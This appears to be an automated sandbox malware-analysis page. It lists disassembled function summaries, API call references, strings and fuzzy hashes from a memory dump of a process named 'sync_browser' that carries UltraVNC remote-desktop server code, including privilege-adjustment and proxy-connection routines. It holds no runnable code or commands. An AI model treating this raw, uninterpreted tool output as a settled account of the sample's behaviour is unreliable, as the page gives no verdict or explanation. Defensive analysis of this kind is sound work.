Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
Instruction ID: aafd96d67158f8196d35cf0a0117f26d846df049e31135ddb4238683825519e7
Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
Instruction Fuzzy Hash: F6615BA2B185E282F718AB64D4156BDB790EF85B48FC4803BED9E4B691DF3CD509C320

Function 00007FF7D5952650 Relevance: 18.4, APIs: 9, Strings: 3, Instructions: 431COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D59E7BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF7D5983771), ref: 00007FF7D59E7BFE

Part of subcall function 00007FF7D59E7BAC: _getptd.LIBCMT ref: 00007FF7D59E7BB4

rand.LIBCMT ref: 00007FF7D59526B0

Part of subcall function 00007FF7D59E7BC4: _getptd.LIBCMT ref: 00007FF7D59E7BC8

rand.LIBCMT ref: 00007FF7D59526B8
rand.LIBCMT ref: 00007FF7D59526C4

Part of subcall function 00007FF7D5935490: rand.LIBCMT ref: 00007FF7D59354D2
Part of subcall function 00007FF7D5935490: rand.LIBCMT ref: 00007FF7D59354DA
Part of subcall function 00007FF7D5935490: rand.LIBCMT ref: 00007FF7D59354E6

rand.LIBCMT ref: 00007FF7D59526F0
rand.LIBCMT ref: 00007FF7D59526F8
rand.LIBCMT ref: 00007FF7D5952704
rand.LIBCMT ref: 00007FF7D59527DB
rand.LIBCMT ref: 00007FF7D59527E3
rand.LIBCMT ref: 00007FF7D59527EF

Strings

After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u, xrefs: 00007FF7D5952BD3
interKey larger than maxNum, xrefs: 00007FF7D59529CA
CheckUserGroupPasswordUni result=%i, xrefs: 00007FF7D5952C3C

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: rand$Time_getptd$FileSystem
String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
API String ID: 3485648590-3000200491
Opcode ID: a3ff226198b317dc9944d335c8f75175da97f0ba89ea36ea833236189cd01347
Instruction ID: a84578c402e6bdd66fe5cafbdd97da4fbbcb8410ed6d87c47d79451e8339b33f
Opcode Fuzzy Hash: a3ff226198b317dc9944d335c8f75175da97f0ba89ea36ea833236189cd01347
Instruction Fuzzy Hash: 47F1D352B1A3D54BEB00D7BA54101BDABA09B82B89FD44077DE9D2BB9BDE3CD101C720

Function 00007FF7D5933A90 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF7D5933AB6
LoadImageA.USER32 ref: 00007FF7D5933B68
GetModuleHandleA.KERNEL32 ref: 00007FF7D5933B7C
LoadImageA.USER32 ref: 00007FF7D5933B9C
CreateDCA.GDI32 ref: 00007FF7D5933BC5
GetDIBits.GDI32 ref: 00007FF7D5933BF1
DeleteDC.GDI32 ref: 00007FF7D5933C0E

Strings

DISPLAY, xrefs: 00007FF7D5933BA9
(, xrefs: 00007FF7D5933BB8
\background.bmp, xrefs: 00007FF7D5933B41

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ImageLoadModule$BitsCreateDeleteFileHandleName
String ID: ($DISPLAY$\background.bmp
API String ID: 3125945695-1422902838
Opcode ID: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
Instruction ID: aba95d65a7ec67e829d93287338d49272a09d2a99dcd8291b2a1811903b03482
Opcode Fuzzy Hash: 5c990643eb74fd538b6b4e7c95b6f894b66b7c2a1e2628e0d5a9c6046c92dc90
Instruction Fuzzy Hash: A2413031A1879187E764AB24B45576EBBA0FF89B94FC01236DE9D47B94DF3CD0058B10

Function 00007FF7D593C810 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 366networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593C520: send.WS2_32 ref: 00007FF7D593C56C

recv.WS2_32 ref: 00007FF7D593C91C
recv.WS2_32 ref: 00007FF7D593C9EC

Strings

basic, xrefs: 00007FF7D593CAF2
CONNECT %s:%d HTTP/1.0, xrefs: 00007FF7D593C895
Proxy-Authenticate:, xrefs: 00007FF7D593C86F
WWW-Authenticate:, xrefs: 00007FF7D593C837
Location: , xrefs: 00007FF7D593CB83

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: recv$send
String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
API String ID: 1963230611-4083095726
Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
Instruction ID: 46c10eaf9685de967f5d58ac31e9895380f835a4136876e9f41415691460ff10
Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
Instruction Fuzzy Hash: EAF1A022A0CA9682FB50A725A54067DAA95EF85F98FC41133DE5D43A95DF3CE543C320

Function 00007FF7D59470B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF7D59470F4
LoadLibraryA.KERNEL32 ref: 00007FF7D5947109
GetProcAddress.KERNEL32 ref: 00007FF7D594712D
CreateDCA.GDI32 ref: 00007FF7D59471D6
FreeLibrary.KERNEL32 ref: 00007FF7D59471F2

Strings

DISPLAY, xrefs: 00007FF7D59471C9
USER32, xrefs: 00007FF7D59470FA
mv video hook driver2, xrefs: 00007FF7D5947198
EnumDisplayDevicesA, xrefs: 00007FF7D594711B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressCreateDisplayEnumFreeLoadProcSettings
String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
API String ID: 3702840025-1174184736
Opcode ID: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
Instruction ID: 4a7f8067c40fc77e767461f48b8cc8b70c6c8f398503b813c6d41d9fb8c8ece9
Opcode Fuzzy Hash: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
Instruction Fuzzy Hash: 3E31612171968286F774AB25B854BAEA694FFC9B58FC40136DE8E47A44DF3CD105C720

Function 00007FF7D5989A40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593D390: GetModuleFileNameA.KERNEL32 ref: 00007FF7D593D3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5989A92
RegOpenKeyExA.ADVAPI32 ref: 00007FF7D5989AC0
RegQueryValueExA.ADVAPI32 ref: 00007FF7D5989B0C
RegCloseKey.ADVAPI32 ref: 00007FF7D5989B3A
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5989B75

Strings

NewMSLogon, xrefs: 00007FF7D5989AFD, 00007FF7D5989B67
Software\ORL\WinVNC3, xrefs: 00007FF7D5989AAD
UseRegistry, xrefs: 00007FF7D5989A81
admin, xrefs: 00007FF7D5989A88, 00007FF7D5989B6E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CloseFileModuleNameOpenQueryValue
String ID: NewMSLogon$Software\ORL\WinVNC3$UseRegistry$admin
API String ID: 771632046-3493897170
Opcode ID: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
Instruction ID: 5cf6b8f09221eedb5b7e5bf34b40689511d090d78c155e9dadb967e31205f15e
Opcode Fuzzy Hash: 7e17a9a545862003f56dca8ab1949a50e46989200b9f0bc494998167346eab91
Instruction Fuzzy Hash: 81314371A1DA9287EA60EB20F455BAEB7A4FF89B48FC01036EA4D47A54DF3DD105CB10

Function 00007FF7D59418A0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7D59418B5
OpenProcess.KERNEL32 ref: 00007FF7D59418C5
OpenProcessToken.ADVAPI32 ref: 00007FF7D59418F5
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF7D594190D
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7D594194D
GetLastError.KERNEL32 ref: 00007FF7D594195B
CloseHandle.KERNEL32 ref: 00007FF7D594196E
CloseHandle.KERNEL32 ref: 00007FF7D5941977

Strings

SeTcbPrivilege, xrefs: 00007FF7D5941904

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenToken$AdjustCurrentErrorLastLookupPrivilegePrivilegesValue
String ID: SeTcbPrivilege
API String ID: 2450735924-1502394177
Opcode ID: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
Instruction ID: 895fcba29ff2f0efaef2d4c10b056bf084273f79cea848b4090e4e828b53ade4
Opcode Fuzzy Hash: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
Instruction Fuzzy Hash: CC213B61A29B4687EB54AB65A40456EA7A0FFC8F44FC44036EE4E47758DF3CD4448B10

Function 00007FF7D59EDF80 Relevance: 15.3, APIs: 10, Instructions: 292timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF7D59EDFAB

Part of subcall function 00007FF7D59F77D0: _amsg_exit.LIBCMT ref: 00007FF7D59F77FA

_get_daylight.LIBCMT ref: 00007FF7D59EDFC1

Part of subcall function 00007FF7D59FCEDC: _errno.LIBCMT ref: 00007FF7D59FCEE5
Part of subcall function 00007FF7D59FCEDC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59FCEF0

_get_daylight.LIBCMT ref: 00007FF7D59EDFD6

Part of subcall function 00007FF7D59FCE7C: _errno.LIBCMT ref: 00007FF7D59FCE85
Part of subcall function 00007FF7D59FCE7C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59FCE90

_get_daylight.LIBCMT ref: 00007FF7D59EDFEB

Part of subcall function 00007FF7D59FCEAC: _errno.LIBCMT ref: 00007FF7D59FCEB5
Part of subcall function 00007FF7D59FCEAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59FCEC0

___lc_codepage_func.LIBCMT ref: 00007FF7D59EDFF8

Part of subcall function 00007FF7D59F0520: _getptd.LIBCMT ref: 00007FF7D59F0524

Part of subcall function 00007FF7D59E945C: __wtomb_environ.LIBCMT ref: 00007FF7D59E948C

free.LIBCMT ref: 00007FF7D59EE069

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

free.LIBCMT ref: 00007FF7D59EE0D2
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D59EE9A6,?,?,?,?,00007FF7D59F0706), ref: 00007FF7D59EE0E5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D59EE9A6,?,?,?,?,00007FF7D59F0706), ref: 00007FF7D59EE19B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D59EE9A6,?,?,?,?,00007FF7D59F0706), ref: 00007FF7D59EE1EE

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
String ID:
API String ID: 2532449802-0
Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
Instruction ID: 47ebc54409a12f00679bcd5c8aa6269d7222e28694484fd60c755f4133f573c9
Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
Instruction Fuzzy Hash: 78C18E32A0D28287E724AF65A54077EBA95BF84F88FC05136DE8D53796DF3CE8118720

Function 00007FF7D59F068C Relevance: 15.3, APIs: 10, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59F06AE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59F06BA
_errno.LIBCMT ref: 00007FF7D59F06E4
__tzset.LIBCMT ref: 00007FF7D59F0701
_get_daylight.LIBCMT ref: 00007FF7D59F070A
_get_daylight.LIBCMT ref: 00007FF7D59F071B
_get_daylight.LIBCMT ref: 00007FF7D59F072C
_isindst.LIBCMT ref: 00007FF7D59F0770
_isindst.LIBCMT ref: 00007FF7D59F07C0
__getgmtimebuf.LIBCMT ref: 00007FF7D59F09BA

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
String ID:
API String ID: 1457502553-0
Opcode ID: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
Instruction ID: 9674513ed167c2b1f7da7654c1ca9861fd3052b95ca6e926f442fd18f56ff650
Opcode Fuzzy Hash: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
Instruction Fuzzy Hash: 6091F872B0474647EB58AF25C8113BCA299EB54B8DFC48037EE0E4AB89EF3CE5408710

Function 00007FF7D5936060 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 354libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7D59360A0
GetVersion.KERNEL32 ref: 00007FF7D59364EF
GetProcAddress.KERNEL32 ref: 00007FF7D593656B
GetSystemInfo.KERNEL32 ref: 00007FF7D5936582
GetSystemInfo.KERNEL32 ref: 00007FF7D5936594

Strings

GetVersionExA, xrefs: 00007FF7D5936093
GetNativeSystemInfo, xrefs: 00007FF7D5936561
@, xrefs: 00007FF7D59363F2

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressInfoProcSystem$Version
String ID: @$GetNativeSystemInfo$GetVersionExA
API String ID: 4103462327-1183986914
Opcode ID: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
Instruction ID: 93713e3b3732edc01ccbc1a2e38ced1a8fc51c5535632bfea651a41186c1fa0d
Opcode Fuzzy Hash: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
Instruction Fuzzy Hash: 3FF14B76A08281CAFB54AF35D0403ADBBA1FB45B4CF988036DE5D4A299DB38E545CB21

Function 00007FF7D59551B7 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 399COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2

Part of subcall function 00007FF7D5931AE0: OpenClipboard.USER32 ref: 00007FF7D5931B0B

Strings

vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
